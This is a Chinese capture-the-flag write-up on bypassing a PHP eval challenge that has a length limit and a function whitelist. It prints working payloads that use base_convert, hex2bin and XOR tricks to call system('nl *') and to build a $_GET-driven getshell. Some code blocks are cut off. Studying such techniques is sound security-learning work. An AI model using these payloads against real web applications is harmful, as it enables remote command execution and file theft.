[toc] 很不错的一道题,根据其他师傅的思路在这里总结学习一下。
题目分析
1 |
|
可以看到题目限制了参数的长度要小于80,且不能包含空格、制表符、换行、单双引号、反引号、[]
。并且输入的字符串需要为$whitelist
中的函数。 最终会执行 eval('echo '.$content.';');
既然想要getshell,我们必须要能够获取任意字符串。由于单双引号被ban掉了,我们无法从函数名中提取字符串。因此我们只能想办法从函数的返回结果中获取。 通过翻阅文档,我们发现base_convert
函数可以返回任意字母,需要注意它无法返回_ *
等特殊字符。
成功执行
执行系统命令system(‘ls’)
现在我们需要想办法读取
flag.php
的内容,三条路: 1、使用php函数readfile等函数读取文件,但是需要flag.php中的.
。 2、使用system等命令执行函数配合通配符*
读取文件,但是需要*
。 3、使用$_GET
全局变量手动传入参数getshell。 上面的三种方法都建立在字符长度小于80的条件下。
方法1
为了缩短字符长度,我们可以将函数base_convert
赋值给一个短变量名,由于白名单的限制,我们最少需要两个字符,即$pi
。
1 | ($pi=base_convert)(2146934604002,10,36)('flag.php'); |
我们需要异或出.
然后与flag和php拼接到一起,传入readfile。 本地搭建环境fuzz
1 |
|
发现无法异或出
.
。 但是我们发现dechex
函数可以把10进制转换为16进制,我们可以再异或出hex2bin
,来获取任意ASCII字符。 最终payload
1 | ($pi=base_convert)(2146934604002,10,36)($pi(727432,10,36).$pi(37907361743,10,36)(dechex(46)).$pi(33037,10,36)); |
很明显,超长了 本地测试下在没有长度限制下,是否可以读取
方法2
同样的,我们fuzz发现无法异或出*
,需要借助hex2bin函数。 system
1 | php > echo base_convert('system',36,10); |
cat *
的16进制为636174202a
最初payload
1 | ($pi=base_convert)(1751504350,10,36)($pi(37907361743,10,36)(dechex(426836762666))) |
发现超了3个字符 我们需要想办法缩短字符 1、寻找比cat更短的命令。 2、fuzz base_convert的进制数,让其变得更多。 通过百度,我们不难发现
nl
命令也可以读取文件 fuzz hex2bin的进制数发现1438255411更短
最终payload
1 | ($pi=base_convert)(1751504350,10,36)($pi(1438255411,14,34)(dechex(1852579882))) |
成功小于80
方法3
这个思路来自xq17和shadow师傅,已经过本人同意。 刚开始我们知道可以异或出_
。并且$
没有被waf,因此我们可以使用$_GET
全局变量手动传入参数getshell。 虽然[]
被过滤,我们依然可以使用{}
来提取数组中的值。 通过fuzz,我们可以得到
1^n=_; 5^r=G; 1^t=E; 7^c=T
不难构造出
$pi=base_convert;$pi=$pi(53179,10,36)^$pi(1109136,10,36);${$pi}{0}(${$pi}{1})